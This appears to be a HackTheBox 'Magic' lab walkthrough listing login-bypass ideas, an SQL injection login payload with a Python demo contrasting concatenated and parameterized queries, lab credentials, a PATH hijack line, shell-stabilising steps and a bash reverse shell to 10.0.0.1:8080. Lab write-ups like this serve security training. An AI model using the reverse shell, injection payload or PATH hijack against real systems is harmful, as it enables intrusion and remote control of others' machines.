MAGIC HackTheBox Walkthrough

  1. Brute-force the password with common usernames like admin, root, guest, etc.
  2. The login page is vulnerable to SQL injection, and we could use that to dump the database, which could contain user credentials
  3. The login page could be vulnerable to NoSQL injection, and we could use it to dump user credentials from the database
  4. We could use SQL injection or NoSQL injection to bypass the login page
  5. It could just be a rabbit hole put there to slow us down and waste our time
  6. We could try dumb credentials like admin:admin, guest:guest, admin:password and hope we get lucky
  7. The login credentials have been left somewhere on the box, probably in NFS shares, an SMB share or even some random web directory, and we need to find them using various methods
admin' ORDER BY 1-- -
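Why the input above gets past a login check, shown as an added example that is not code from the original walkthrough or from the target box: a login query built by string concatenation next to a parameterized one, both fed that same input. The SQLite backend, the `login` table layout and the sample password are assumptions made for the demonstration.

```python
import hashlib
import hmac
import sqlite3


def hash_pw(password):
    # Unsalted SHA-256 keeps the demo short; real systems use a slow, salted KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    # Constructed sample data: table layout, user and password are assumptions.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, pw_hash TEXT)")
    db.execute("INSERT INTO login (username, pw_hash) VALUES (?, ?)",
               ("admin", hash_pw("constructed-sample-password")))
    return db


def login_concat(db, username, password):
    """Weak form: user input is pasted into the SQL text itself."""
    sql = ("SELECT id FROM login WHERE username = '" + username +
           "' AND pw_hash = '" + hash_pw(password) + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def login_param(db, username, password):
    """Hardened form: input is bound as data, hash compared in constant time."""
    row = db.execute("SELECT pw_hash FROM login WHERE username = ?",
                     (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], hash_pw(password))


def demo():
    db = make_db()
    payload = "admin' ORDER BY 1-- -"  # the input quoted in this walkthrough
    return {
        "concat_payload": login_concat(db, payload, "anything"),
        "param_payload": login_param(db, payload, "anything"),
        "param_valid": login_param(db, "admin", "constructed-sample-password"),
        "param_wrong": login_param(db, "admin", "wrong"),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'authenticated' if ok else 'rejected'}")
```

In the concatenated query the quote closes the username string and `-- -` comments out the password comparison, so the row for admin is returned without a password check; the bound parameter treats the whole input as a username that does not exist.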
bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'
theseus:iamkingtheseus
admin:Th3s3usW4sK1ng
/usr/bin
export PATH=/tmp:$PATH
theseus:Th3s3usW4sK1ng
su: must be run from a terminal
1. python3 -c 'import pty;pty.spawn("/bin/bash")'
OR
1. python -c 'import pty;pty.spawn("/bin/bash")'
2. ctrl + z (background the session)
3. stty raw -echo;fg
(press enter twice)
4. export TERM=screen (enables clearing screen)

Penetration Tester/Analytical Chemist who Loves Cybersecurity. GitHub(https://github.com/musyoka101), ExploitDB(https://www.exploit-db.com/?author=10517)

Musyoka Ian
